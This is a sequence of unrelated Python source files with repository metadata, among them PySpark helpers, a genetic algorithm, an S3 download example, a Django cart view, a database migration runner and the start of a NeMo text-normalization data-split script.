] |
it-zyk@outlook.com
|
1d82f772f429dc0332e5f8d1b7f993895f9f527b
|
b2e1d96c0551b6b31ef85353f9b6e5b6354d64e8
|
/datafaucet/spark/rows.py
|
97e9ffa97152917b124d55ef93a80b38b4716046
|
[
"MIT"
] |
permissive
|
SylarCS/datafaucet-1
|
8bd7b96cecc5592e153b61367892e2a63a96119d
|
a63074ba1fb1a6d15f06e2bfff05df754aaaa452
|
refs/heads/master
| 2020-09-15T06:04:31.999012
| 2019-11-18T20:00:55
| 2019-11-18T20:00:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,062
|
py
|
import sys
from random import randint
from pyspark.sql import DataFrame
from datafaucet.spark import dataframe
INT_MAX = sys.maxsize
INT_MIN = -sys.maxsize-1
def sample(df, n=1000, *col, seed=None):
# n 0<float<=1 -> fraction of samples
# n floor(int)>1 -> number of samples
# todo:
# n dict of key, value pairs or array of (key, value)
# cols = takes alist of columns for sampling if more than one column is provided
# if a stratum is not specified, provide equally with what is left over form the total of the other quota
if n>1:
count = df.count()
fraction = n/count
return df if fraction>1 else df.sample(False, fraction, seed=seed)
else:
return df.sample(False, n, seed=seed)
_sample = sample
class Rows:
def __init__(self, df, scols=None, gcols=None):
self.df = df
self.gcols = gcols or []
self.scols = scols or df.columns
self.scols = list(set(self.scols) - set(self.gcols))
@property
def columns(self):
return [x for x in self.df.columns if x in (self.scols + self.gcols)]
def overwrite(self,data):
df = self.df
return df.sql_ctx.createDataFrame(data,df.schema)
def append(self, data):
df = self.df
return df.unionByName(df.sql_ctx.createDataFrame(data, df.schema))
def sample(self, n=1000, *cols, random_state=True):
return _sample(self.df, n, *cols, random_state)
def filter_by_date(self, column=None, start=None, end=None, window=None):
df = dataframe.filter_by_datetime(self.df, column, start, end, window)
return df
def filter(self, *args, **kwargs):
return self.df.filter(*args, **kwargs)
@property
def cols(self):
from datafaucet.spark.cols import Cols
return Cols(self.df, self.scols, self.gcols)
@property
def data(self):
from datafaucet.spark.data import Data
return Data(self.df, self.scols, self.gcols)
def _rows(self):
return Rows(self)
DataFrame.rows = property(_rows)
|
[
"natalino.busa@gmail.com"
] |
natalino.busa@gmail.com
|
87a59bc42433821ff6c353a9e24ee2417a5de00f
|
a6fae33cdf3d3cb0b0d458c2825a8d8cc010cd25
|
/l3/z3/.history/population_20200522014505.py
|
3e8108e382a859c114f46c50cbcf52c462b42894
|
[] |
no_license
|
Qabrix/optimization_amh
|
12aab7c7980b38812ec38b7e494e82452a4176b4
|
6a4f5b897a4bef25f6e2acf535ba20ace7351689
|
refs/heads/main
| 2022-12-28T10:57:00.064130
| 2020-10-17T22:57:27
| 2020-10-17T22:57:27
| 304,983,340
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,540
|
py
|
import random
import numpy as np
from utils import calculate_value, decision
class Inhabitant:
def __init__(self, gene, value=0):
self.gene = gene
self.value = 0
def __iter__(self):
for char in self.gene:
yield char
def __len__(self):
return len(self.gene)
def __getitem__(self, item):
return self.gene[item]
def get_str_gene(self, up):
return "".join(self.gene[:up])
class Population:
def __init__(self, population_size, all_puzzle_keys, starter_words):
self.all_puzzle_keys = all_puzzle_keys
self.best_res = None
self.population_size = population_size
self.generation = self._gen_generation(starter_words)
def __iter__(self):
for inhabitant in self.generation:
yield inhabitant
def _random_word(self):
return random.sample(self.all_puzzle_keys, len(self.all_puzzle_keys))
def _gen_generation(self, starter_words):
min_size = min([len(word) for word in starter_words])
max_size = max([len(word) for word in starter_words])
generation = []
for word in starter_words:
generation.append(Inhabitant(list(word)))
for _ in range(len(starter_words), self.population_size):
word = self._random_word()[: random.randint(min_size, max_size)]
generation.append(Inhabitant(word))
return generation
def sorted_generation(self):
return sorted(self.generation, key=lambda x: x.value, reverse=True)
def make_selection(self, elite_percentage, percentage=0.75):
selection = []
sorted_generation = self.sorted_generation()
selection_size = int(self.population_size * percentage)
elite_size = int(elite_percentage * selection_size)
for inhabitant in sorted_generation[:elite_size]:
selection.append(inhabitant)
if elite_size - selection_size < 0:
for inhabitant in sorted_generation[elite_size - selection_size :]:
selection.append(inhabitant)
return selection
def _check_if_correct(self, word):
possible_chars = self.all_puzzle_keys.copy()
for char in word:
if char in possible_chars:
possible_chars.remove(char)
else:
return False
return True
def recombinate(self, elite_percentage=0.6):
selection = self.make_selection(elite_percentage)
permutation = np.random.permutation(len(selection))
new_generation = []
new_generation.append(Inhabitant(selection[0].gene.copy()))
new_generation.append(Inhabitant(selection[1].gene.copy()))
for i in range(1, len(permutation)):
pivot = random.randint(
0,
min(
len(selection[permutation[i % len(permutation)]]),
len(selection[permutation[(i + 1) % len(permutation)]]),
)
// 2,
)
new_word = (
selection[permutation[i % len(permutation)]][:pivot]
+ selection[permutation[(i + 1) % len(permutation)]][pivot:]
)
if self._check_if_correct(new_word):
new_generation.append(Inhabitant(new_word))
else:
new_generation.append(
Inhabitant(selection[permutation[i % len(permutation)]].gene)
)
new_word = (
selection[permutation[(i + 1) % len(permutation)]][:pivot]
+ selection[permutation[i % len(permutation)]][pivot:]
)
if self._check_if_correct(new_word):
new_generation.append(Inhabitant(new_word))
else:
new_generation.append(
Inhabitant(selection[permutation[(i + 1) % len(permutation)]].gene)
)
self.generation = new_generation
def mutate(
self,
min_swap_probability=0.2,
max_swap_probability=0.7,
inverse_probability=0.001,
random_probability=0.05,
shift_probability=0.001,
insert_probability=0.9,
):
swap_probability = random.uniform(min_swap_probability, max_swap_probability)
for inhabitant in self.generation[1:]:
if decision(insert_probability):
insert_amount = random.randint(1, 2)
if decision(0.5): # remove decision
if(len(inhabitant)+insert_amount < len(self.all_puzzle_keys)):
possible_chars = self._random_word()
for char in inhabitant.gene:
if char in possible_chars:
possible_chars.remove(char)
if decision(0.33):
inhabitant.gene += possible_chars[:insert_amount]
elif decision(0.5):
inhabitant.gene = possible_chars[:insert_amount] + inhabitant.gene
else:
insert_index = random.randint(1, len(inhabitant.gene))
inhabitant.gene = inhabitant.gene[:insert_index] + possible_chars[:insert_amount] + inhabitant.gene[insert_index:]
else:
if(len(inhabitant)-insert_amount > 0):
if decision(0.5):
inhabitant.gene = inhabitant.gene[insert_amount:]
else:
inhabitant.gene = inhabitant.gene[:-insert_amount]
elif decision(random_probability):
inhabitant.gene = self._random_word()
else:
if decision(shift_probability):
shift_range = random.randint(1, 3)
for _ in range(shift_range + 1):
inhabitant.gene = [inhabitant.gene[-1]] + inhabitant.gene[:-1]
for i in range(len(inhabitant.gene) // 2):
if decision(swap_probability):
random_id = random.randint(0, len(inhabitant) - 1)
inhabitant.gene[i], inhabitant.gene[random_id] = (
inhabitant.gene[random_id],
inhabitant.gene[i],
)
if decision(inverse_probability):
inhabitant.gene = inhabitant.gene[::-1]
|
[
"kubabalicki@gmail.com"
] |
kubabalicki@gmail.com
|
8efeda44d905898ff678ae343caf148717963d54
|
38c606ed14564591c1aa6e65c7dab255aebf76f9
|
/0x11-python-network_1/5-hbtn_header.py
|
2c76d103cd07681c5295f2c7dd0ea62d4798e81a
|
[] |
no_license
|
camilooob/holbertonschool-higher_level_programming
|
d7cee708b308bed86fcc384d7451de26fa9cafaa
|
db9b6760e7e4998c5f00a4f2cfeb17ec14e44cab
|
refs/heads/master
| 2020-09-29T00:19:25.736344
| 2020-05-15T01:34:32
| 2020-05-15T01:34:32
| 226,900,553
| 1
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 183
|
py
|
#!/usr/bin/python3
"""the package request"""
if __name__ == "__main__":
import requests
import sys
r = requests.get(sys.argv[1])
print(r.headers.get('X-Request-Id'))
|
[
"camilobaq@hotmail.com"
] |
camilobaq@hotmail.com
|
0332091c980a247b508924dc4e03710be5f08839
|
b0856a2d66cc4c71705b8c16c169848070294cf6
|
/removeDupSortedArray.py
|
3f60a7ee970822ff9418506693aa240504fabb51
|
[] |
no_license
|
jfriend08/LeetCode
|
9e378ff015edc3102a4785b0832cf0eeb09f5fc2
|
f76d3cf2e7fd91767f80bd60eed080a7bad06e62
|
refs/heads/master
| 2021-01-21T19:28:25.354537
| 2016-01-15T04:53:11
| 2016-01-15T04:53:11
| 28,518,328
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 832
|
py
|
'''
Follow up for "Remove Duplicates":
What if duplicates are allowed at most twice?
For example,
Given sorted array nums = [1,1,1,2,2,3],
Your function should return length = 5, with the first five elements of nums being 1, 1, 2, 2 and 3.
It doesn't matter what you leave beyond the new length.
Subscribe to see which companies asked this question
'''
class Solution(object):
def removeDuplicates(self, nums):
if not nums:
return 0
mapCount = {}
maxNum = nums[-1]
for num in nums:
try:
mapCount[num] += 1
except:
mapCount[num] = 1
res = []
for num in xrange(maxNum+1):
if num in mapCount:
res += ( [num] if mapCount[num]==1 else [num, num])
return len(res)
sol = Solution()
print sol.removeDuplicates([1,1,1,2,2,3])
print sol.removeDuplicates([])
|
[
"ys486@cornell.edu"
] |
ys486@cornell.edu
|
bfe8e4bc295bbf5a06577105e22905e15b024ebe
|
1aec3c93eaa1fc271ea80141a3a41a24cd60c8d9
|
/mcrouter/test/test_loadbalancer_route.py
|
854b6970f6db6a6b80bfcb4620c6a999a5ebd5a3
|
[
"BSD-3-Clause"
] |
permissive
|
boboozy/mcrouter
|
810859b997ea2c687c67723a3ad94aa88e93b746
|
d78f599bd3887a87d5785422a25e3ac07b0de169
|
refs/heads/master
| 2021-07-25T09:52:09.175808
| 2017-11-04T01:02:51
| 2017-11-04T01:11:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,743
|
py
|
# Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from mcrouter.test.MCProcess import Mcrouter
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestLoadBalancerRoute(McrouterTestCase):
config = './mcrouter/test/test_loadbalancer_route.json'
null_route_config = './mcrouter/test/test_nullroute.json'
mcrouter_server_extra_args = ['--server-load-interval-ms=50']
extra_args = []
def setUp(self):
self.mc = []
for _i in range(8):
self.mc.append(Mcrouter(self.null_route_config,
extra_args=self.mcrouter_server_extra_args))
self.add_server(self.mc[_i])
self.mcrouter = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
def test_loadbalancer(self):
n = 20000
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(not self.mcrouter.get(key))
self.assertTrue(self.mcrouter.stats()['cmd_get_count'] > 0)
lblrc = 'load_balancer_load_reset_count'
self.assertEqual(int(self.mcrouter.stats("all")[lblrc]), 0)
sum = 0
for i in range(8):
self.assertTrue(self.mc[i].stats()['cmd_get_count'] > 0)
sum += int(self.mc[i].stats()['cmd_get_count'])
self.assertEqual(sum, n)
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
2c198ce9caa80d3848e36c87c340082b71dfce04
|
4d37628a27c5a50a70fa06f78be346223c37ade0
|
/jobs/migrations.py
|
88f61681fe41fbe0da93397de6760842a9ab4e57
|
[
"MIT"
] |
permissive
|
vinissimus/jobs
|
93dbc0fd2c755b63d685165996b27a260e5e367c
|
6e15749465f7da44e4dc0ad2f520ea6f7fbb67fe
|
refs/heads/master
| 2023-01-01T01:29:50.332671
| 2020-10-23T15:27:49
| 2020-10-23T15:27:49
| 281,219,465
| 7
| 0
|
MIT
| 2020-10-23T15:31:47
| 2020-07-20T20:30:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,978
|
py
|
from .utils import setup_stdout_logging
from pathlib import Path
import asyncio
import asyncpg
import glob
import logging
import sys
import typing
logger = logging.getLogger("jobs")
current = Path(__file__)
def get_migrations_path() -> Path:
return current.parent / "sql"
def get_available():
files: typing.Dict[int, str] = {}
path = str(get_migrations_path())
for item in glob.glob(f"{path}/*.up.sql"):
file = item.replace(path + "/", "")
version = int(file.split("_")[0])
files[version] = file
return files
def load_migration(name: str):
file = get_migrations_path() / name
with file.open() as f:
return f.read()
async def migrate(db: asyncpg.Connection = None):
migrations = get_available()
try:
current = await db.fetchval("SELECT migration FROM jobs.migrations")
except asyncpg.exceptions.UndefinedTableError:
current = 0
logger.info("Current migration %s", current)
applied = current
async with db.transaction():
for avail in sorted(list(migrations.keys())):
if avail > current:
logger.info("Appling migration %s", migrations[avail])
data = load_migration(migrations[avail])
await db.execute(data)
applied = avail
if applied != current:
logger.info("Update migrations history version: %s", applied)
await db.execute("update jobs.migrations set migration=$1", applied)
else:
logger.info("No migrations applied. Your db it's at latest version")
async def main(dsn: str):
db = await asyncpg.connect(dsn=dsn)
await migrate(db)
usage = """
run it with:
job-migrations postgresql://xxx:xxxx@localhost:5432/db
"""
def run():
if len(sys.argv) != 2:
print(usage)
sys.exit(1)
setup_stdout_logging()
dsn = sys.argv[1]
asyncio.run(main(dsn))
if __name__ == "__main__":
run()
|
[
"jordic@gmail.com"
] |
jordic@gmail.com
|
a98daa0410363b639ee81fc77a48ba3c678abf66
|
48e124e97cc776feb0ad6d17b9ef1dfa24e2e474
|
/sdk/python/pulumi_azure_native/insights/get_guest_diagnostics_settings_association.py
|
3440cdd68c76aa4250f607aaf13bbb8ba2ffb7dc
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
bpkgoud/pulumi-azure-native
|
0817502630062efbc35134410c4a784b61a4736d
|
a3215fe1b87fba69294f248017b1591767c2b96c
|
refs/heads/master
| 2023-08-29T22:39:49.984212
| 2021-11-15T12:43:41
| 2021-11-15T12:43:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,562
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetGuestDiagnosticsSettingsAssociationResult',
'AwaitableGetGuestDiagnosticsSettingsAssociationResult',
'get_guest_diagnostics_settings_association',
'get_guest_diagnostics_settings_association_output',
]
@pulumi.output_type
class GetGuestDiagnosticsSettingsAssociationResult:
"""
Virtual machine guest diagnostic settings resource.
"""
def __init__(__self__, guest_diagnostic_settings_name=None, id=None, location=None, name=None, tags=None, type=None):
if guest_diagnostic_settings_name and not isinstance(guest_diagnostic_settings_name, str):
raise TypeError("Expected argument 'guest_diagnostic_settings_name' to be a str")
pulumi.set(__self__, "guest_diagnostic_settings_name", guest_diagnostic_settings_name)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="guestDiagnosticSettingsName")
def guest_diagnostic_settings_name(self) -> str:
"""
The guest diagnostic settings name.
"""
return pulumi.get(self, "guest_diagnostic_settings_name")
@property
@pulumi.getter
def id(self) -> str:
"""
Azure resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Azure resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Azure resource type
"""
return pulumi.get(self, "type")
class AwaitableGetGuestDiagnosticsSettingsAssociationResult(GetGuestDiagnosticsSettingsAssociationResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetGuestDiagnosticsSettingsAssociationResult(
guest_diagnostic_settings_name=self.guest_diagnostic_settings_name,
id=self.id,
location=self.location,
name=self.name,
tags=self.tags,
type=self.type)
def get_guest_diagnostics_settings_association(association_name: Optional[str] = None,
resource_uri: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetGuestDiagnosticsSettingsAssociationResult:
"""
Virtual machine guest diagnostic settings resource.
API Version: 2018-06-01-preview.
:param str association_name: The name of the diagnostic settings association.
:param str resource_uri: The fully qualified ID of the resource, including the resource name and resource type.
"""
__args__ = dict()
__args__['associationName'] = association_name
__args__['resourceUri'] = resource_uri
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:insights:getGuestDiagnosticsSettingsAssociation', __args__, opts=opts, typ=GetGuestDiagnosticsSettingsAssociationResult).value
return AwaitableGetGuestDiagnosticsSettingsAssociationResult(
guest_diagnostic_settings_name=__ret__.guest_diagnostic_settings_name,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
tags=__ret__.tags,
type=__ret__.type)
@_utilities.lift_output_func(get_guest_diagnostics_settings_association)
def get_guest_diagnostics_settings_association_output(association_name: Optional[pulumi.Input[str]] = None,
resource_uri: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetGuestDiagnosticsSettingsAssociationResult]:
"""
Virtual machine guest diagnostic settings resource.
API Version: 2018-06-01-preview.
:param str association_name: The name of the diagnostic settings association.
:param str resource_uri: The fully qualified ID of the resource, including the resource name and resource type.
"""
...
|
[
"noreply@github.com"
] |
bpkgoud.noreply@github.com
|
1fcab9c53a7ede0ecb7dfb6ee6e2ec6b84a8d078
|
0f44be0680ccbc2f8f96abfe97f5d1a094cd6e98
|
/erokov.py
|
494d719d07af47089ded91dc77709f24a452c75e
|
[] |
no_license
|
kimihito/erokov
|
f75bf3199531af17a700dac854f00df19b59d3c1
|
32390edbade3d84f8be87367654ff1f6c229ca62
|
refs/heads/master
| 2016-09-05T23:20:41.926046
| 2012-08-27T10:33:11
| 2012-08-27T10:33:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,019
|
py
|
#!/usr/bin/env python
# coding: utf-8
#AVのタイトルをマルコフ連鎖で作るスクリプトを書いてます
import random
import MeCab
def wakati(text):
t = MeCab.Tagger("-Owakati")
m = t.parse(text)
result = m.split(" ")
return result
if __name__ == "__main__":
filename = "title_sort_uniq.txt"
wordlist = []
src = open(filename,"r").read().split("\n")
for tmpsrc in src:
wordlist += wakati(tmpsrc)
erokov = {}
w1 = ""
w2 = ""
for word in wordlist:
if w1 and w2:
if (w1,w2) not in erokov:
erokov[(w1,w2)] = []
erokov[(w1,w2)].append(word)
w1,w2 = w2, word
count = 0
sentence = ""
w1,w2 = random.choice(erokov.keys())
while count < 11:
try:
tmp = random.choice(erokov[(w1,w2)])
sentence += tmp
w1,w2 = w2, tmp
count += 1
except KeyError:
print "Error!"
pass
print sentence
|
[
"tatsurotamashiro@gmail.com"
] |
tatsurotamashiro@gmail.com
|
f80e0eb67f0790a4fdf274aeb6c73eb6e9eec19b
|
cdc996370837c00003296556afdb33e2f2fee884
|
/devel_scripts/launcher.py
|
5237995d7e1aaac822ae3a4d546bf7b117644b25
|
[] |
no_license
|
capitaneanu/borunte_robot
|
1d4f14aadb2aa9e041ea0fdccc85d424cf155fb2
|
85e8765cbfae879f297c5254733a2dea48daeba0
|
refs/heads/master
| 2022-09-15T03:09:14.062484
| 2020-05-20T17:39:01
| 2020-05-20T17:39:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,218
|
py
|
# -*- coding: utf-8 -*-
import os
import shlex
import sys
import time
TIMEOUT = 1.0
processes = [] # type: List[sh.RunningCommand]
class ProgramTerminated(Exception):
pass
def check_pid(pid):
""" Check For the existence of a unix pid. """
try:
os.kill(pid, 0)
except OSError:
return False
else:
return True
def start_process(command, line):
"""
:type command: sh.Command
"""
processes.append(
command(shlex.split(line), _out=sys.stdout, _err=sys.stderr, _bg=True)
)
time.sleep(TIMEOUT)
def terminate_processes():
for process in processes:
if process is None:
continue
try:
process.terminate()
except OSError:
pass
process.wait()
def check_processes():
for process in processes:
if process is None:
continue
if not check_pid(process.pid):
raise ProgramTerminated()
def wait_loop():
try:
while True:
check_processes()
time.sleep(TIMEOUT)
except KeyboardInterrupt:
pass
except ProgramTerminated:
print('A program terminated, stopping other processes.')
|
[
"mail@roessler.systems"
] |
mail@roessler.systems
|
15c9096c932868854571f4061ed0c3a68eec026e
|
6efc2eb23678741263da7ac6bd868a9f3a37d38b
|
/01.stock_investment/05.chart_analysis/test_boto3/test_s3_download.py
|
363a8247b52c0222ee245d335c3d2c697ee9f4c1
|
[] |
no_license
|
predora005/business-research
|
c6272b129353a302673cf8a13c1629b5ade4a50e
|
96743cc6a0b592c87e6d0f2de341fc3bbb3ef3b1
|
refs/heads/main
| 2023-06-18T08:08:24.537951
| 2021-07-22T04:19:09
| 2021-07-22T04:19:09
| 314,985,045
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,270
|
py
|
# coding: utf-8
import boto3
import tempfile
##################################################
# メイン
##################################################
if __name__ == '__main__':
BUCKET_NAME = ''
OBJECT_NAME1 = 'dir1/file1.txt'
FILE_NAME1 = 'file1.txt'
OBJECT_NAME2 = 'dir1/file2.txt'
FILE_NAME2 = 'file2.txt'
OBJECT_NAME3 = 'dir2/file3.csv'
FILE_NAME3 = 'file3.csv'
OBJECT_NAME4 = 'dir2/file4.txt'
FILE_NAME4 = 'file4.txt'
##############################
s3 = boto3.resource('s3')
s3.Bucket(BUCKET_NAME).download_file(OBJECT_NAME1, FILE_NAME1)
##############################
# The download_file method
s3 = boto3.client('s3')
s3.download_file(BUCKET_NAME, OBJECT_NAME2, FILE_NAME2)
##############################
s3 = boto3.resource('s3')
bucket = s3.Bucket(BUCKET_NAME)
with open(FILE_NAME3, 'wb') as f:
bucket.download_fileobj(OBJECT_NAME3, f)
##############################
# The download_fileobj method
s3 = boto3.client('s3')
with open(FILE_NAME4, 'wb') as f:
#with tempfile.NamedTemporaryFile(mode='wb') as f:
s3.download_fileobj(BUCKET_NAME, OBJECT_NAME4, f)
print(f.name)
print(f.tell)
|
[
"46834065+predora005@users.noreply.github.com"
] |
46834065+predora005@users.noreply.github.com
|
624e6493ba366cde8a495ba0effb21374417bbd1
|
4d0213e588149b9fa86fbe35faea8657052d9254
|
/setup.py
|
27b1a3f4ad3e7c71aeb236803df30c35aed1ff6d
|
[
"Apache-2.0"
] |
permissive
|
Pyligent/gen-efficientnet-pytorch
|
1e492dec87fa33458e452472c65ed0f7afd1a876
|
b3bc163478737924f508978a6f0c96e07046e025
|
refs/heads/master
| 2020-12-14T15:51:36.930259
| 2019-10-30T22:31:10
| 2019-10-30T22:31:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,688
|
py
|
""" Setup
"""
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
exec(open('geffnet/version.py').read())
setup(
name='geffnet',
version=__version__,
description='(Generic) EfficientNets for PyTorch',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/rwightman/gen-efficientnet-pytorch',
author='Ross Wightman',
author_email='hello@rwightman.com',
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
],
# Note that this is a string of words separated by whitespace, not a list.
keywords='pytorch pretrained models efficientnet mixnet mobilenetv3 mnasnet',
packages=find_packages(exclude=['data']),
install_requires=['torch >= 1.1', 'torchvision'],
python_requires='>=3.6',
)
|
[
"rwightman@gmail.com"
] |
rwightman@gmail.com
|
e3fccd35bcac0946969cbb7de0a9f8057ab2c8ee
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/BsPlanInviteConfig.py
|
f6e1ed05d6ca34d93fd5c47f5c13a9c375717bbe
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,362
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class BsPlanInviteConfig(object):
def __init__(self):
self._end_time = None
self._start_time = None
@property
def end_time(self):
return self._end_time
@end_time.setter
def end_time(self, value):
self._end_time = value
@property
def start_time(self):
return self._start_time
@start_time.setter
def start_time(self, value):
self._start_time = value
def to_alipay_dict(self):
params = dict()
if self.end_time:
if hasattr(self.end_time, 'to_alipay_dict'):
params['end_time'] = self.end_time.to_alipay_dict()
else:
params['end_time'] = self.end_time
if self.start_time:
if hasattr(self.start_time, 'to_alipay_dict'):
params['start_time'] = self.start_time.to_alipay_dict()
else:
params['start_time'] = self.start_time
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = BsPlanInviteConfig()
if 'end_time' in d:
o.end_time = d['end_time']
if 'start_time' in d:
o.start_time = d['start_time']
return o
|
[
"jishupei.jsp@alibaba-inc.com"
] |
jishupei.jsp@alibaba-inc.com
|
3ecd4acf486810b559bb1eb756b9b32e70f99558
|
f05084e33f189c3ca16982a6704fa808831fa71a
|
/yayo/cart/views.py
|
5009693a7231de1285c2d32c1e33dd096dbdca83
|
[] |
no_license
|
willyowi/Yayo-maluku-shop
|
f7581ae4c5ca0a1dc6a9daa92701d0965d27914c
|
7c8844bd3cbd97fdac01f991b45ca55b5f419c38
|
refs/heads/master
| 2021-01-06T16:06:36.397007
| 2020-02-18T15:20:46
| 2020-02-18T15:20:46
| 241,390,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 890
|
py
|
from django.shortcuts import render,redirect,get_object_or_404
from django.views.decorators.http import require_POST
from shop.models import Product
from .cart import Cart
from .forms import CartAddProductForm
# Create your views here.
@require_POST
def cart_add(request, product_id):
cart = Cart(request)
product = get_object_or_404(Product, id=product_id)
form = CartAddProductForm(request.POST)
if form.is_valid():
cd = form.cleaned_data
cart.add(product=product,quantity=cd['quantity'],update_quantity=cd['update'])
return redirect('cart:cart_detail')
def cart_remove(request,product_id):
cart = Cart(request)
product = get_object_or_404(Product, id=product_id)
cart.remove(product)
return redirect('cart:cart_detail')
def cart_detail(request):
cart = Cart(request)
return render(request, 'cart/detail.html', {'cart': cart})
|
[
"wilsonowino1@gmail.com"
] |
wilsonowino1@gmail.com
|
a30781f84b1feca4e4a793f1a648138952c65940
|
b2cefb7a2a83aa93ee1b15a780b5ddf6c498215b
|
/examples/nlp/duplex_text_normalization/data/data_split.py
|
3b053a34419980bc0351c55707a288cbdab02f16
|
[
"Apache-2.0"
] |
permissive
|
VahidooX/NeMo
|
bfde8c9b48c818342a9c6290fb9dee62fafeca38
|
866cc3f66fab3a796a6b74ef7a9e362c2282a976
|
refs/heads/main
| 2023-07-23T19:13:39.948228
| 2022-04-29T21:51:54
| 2022-04-29T21:51:54
| 227,733,473
| 1
| 2
|
Apache-2.0
| 2022-09-15T15:30:13
| 2019-12-13T01:55:21
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,238
|
py
|
# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script creates data splits of the Google Text Normalization dataset
of the format mentioned in the `text_normalization doc <https://github.com/NVIDIA/NeMo/blob/main/docs/source/nlp/text_normalization.rst>`.
USAGE Example:
1. Download the Google TN dataset from https://www.kaggle.com/google-nlu/text-normalization
2. Unzip the English subset (e.g., by running `tar zxvf en_with_types.tgz`). Then there will a folder named `en_with_types`.
3. Run this script
# python data_split.py \
--data_dir=en_with_types/ \
--output_dir=data_split/ \
--lang=en
In this example, the split files will be stored in the `data_split` folder.
The folder should contain three subfolders `train`, 'dev', and `test` with `.tsv` files.
"""
from argparse import ArgumentParser
from os import listdir, mkdir
from os.path import isdir, isfile, join
from tqdm import tqdm
from nemo.collections.nlp.data.text_normalization import constants
# Local Constants
TEST_SIZE_EN = 100002
TEST_SIZE_RUS = 100007
def read_google_data(data_file: str, lang: str, split: str):
"""
The function can be used to read the raw data files of the Google Text Normalization
dataset (which can be downloaded from https://www.kaggle.com/google-nlu/text-normalization)
Args:
data_file: Path to the data file. Should be of the form output-xxxxx-of-00100
lang: Selected language.
split: data split
Return:
data: list of examples
"""
data = []
